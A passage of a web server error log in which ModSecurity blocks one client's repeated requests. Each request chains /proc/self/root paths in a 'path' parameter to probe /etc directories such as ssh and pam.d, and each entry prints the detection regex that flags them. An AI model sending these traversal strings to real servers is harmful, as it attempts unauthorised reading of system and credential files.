"bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RWxCii7xarUs8iHZUegAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:31.835919 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.241.31:42114] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RXzJ3M9BSuKP7CAYD9QAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:33.154367 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.241.31:42128] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RYfHIg5MgXLBnicPmBgAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:34.468559 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:42132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RYhCii7xarUs8iHZUiAAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:35.666344 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:42136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RY_qxLDW4GITHUkTRvgAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:37.110798 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.241.31:42150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RZTJ3M9BSuKP7CAYD-QAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:38.409311 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.241.31:38220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RZl1pVZ5mVmJwsFMcNgAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:39.755219 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.241.31:38234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RZ_HIg5MgXLBnicPmCwAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:41.652560 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:38240] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Rada6ubjKNq_cu4a_FwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:44.043185 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:38256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RbPqxLDW4GITHUkTRwQAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:48.627309 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.241.31:38268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RcPqxLDW4GITHUkTRyQAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:49.954990 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.241.31:38092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Rcbninkcc-iUj5ApLCQAAA4Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:52.162759 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.241.31:38100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RdDJ3M9BSuKP7CAYEAAAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:54.545358 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.241.31:38112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RdfqxLDW4GITHUkTRywAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:57.484867 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:38116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ReDJ3M9BSuKP7CAYEAwAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:00.011602 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.241.31:45830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RfDJ3M9BSuKP7CAYECAAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:01.272707 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.241.31:45832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RffHIg5MgXLBnicPmFAAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:02.606175 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.241.31:45844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RfhCii7xarUs8iHZUrgAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:03.966998 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.241.31:45848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RfzJ3M9BSuKP7CAYECgAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:05.111531 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.241.31:45858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RgfqxLDW4GITHUkTR1AAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:06.480410 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:45862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RghCii7xarUs8iHZUtAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:07.681187 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:51288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Rg-oXxyEfFpUF8f9ucQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
